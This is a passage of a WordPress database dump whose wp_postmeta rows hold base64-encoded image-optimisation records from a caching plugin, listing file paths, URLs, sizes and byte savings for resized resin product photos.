3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODQxLCJpZCI6MTQ2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4NDQsImlkIjoxNDY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMzQsInRpbWUiOjE0ODM1Njg4NDcsImlkIjoxNDY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODQ5LCJpZCI6MTQ2N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODg1MiwiaWQiOjE0Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4NTQsImlkIjoxNDY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODU3LCJpZCI6MTQ2N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODg2MCwiaWQiOjE0Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4NjIsImlkIjoxNDY3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29422, 1466, 'wpfc_optimisation_reduction', '2480540'); 
INSERT INTO `wp_postmeta` VALUES (29423, 1466, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEuanBnIiwicmVkdWN0aW9uIjoyNDgwMzUyLCJ0aW1lIjoxNDgzNTY4ODc0LCJpZCI6IjE0NjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODg3NywiaWQiOjE0NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODgwLCJpZCI6MTQ2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4ODMsImlkIjoxNDY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODg2LCJpZCI6MTQ2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4ODksImlkIjoxNDY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODg5MSwiaWQiOjE0NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODk0LCJpZCI6MTQ2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4OTcsImlkIjoxNDY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMTAsInRpbWUiOjE0ODM1Njg4OTksImlkIjoxNDY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2NSwidGltZSI6MTQ4MzU2ODkwMiwiaWQiOjE0NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg5MDUsImlkIjoxNDY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4OTA3LCJpZCI6MTQ2Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODkxMCwiaWQiOjE0NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg5MTIsImlkIjoxNDY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODAyMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgwMjEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MDIxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4OTE1LCJpZCI6MTQ2Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29424, 1465, 'wpfc_optimisation_reduction', '2531073'); 
INSERT INTO `wp_postmeta` VALUES (29425, 1465, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODYyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODYyLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04NjIuanBnIiwicmVkdWN0aW9uIjoyNTMwOTY0LCJ0aW1lIjoxNDgzNTY4OTI2LCJpZCI6IjE0NjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTg2Mi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTg2Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwi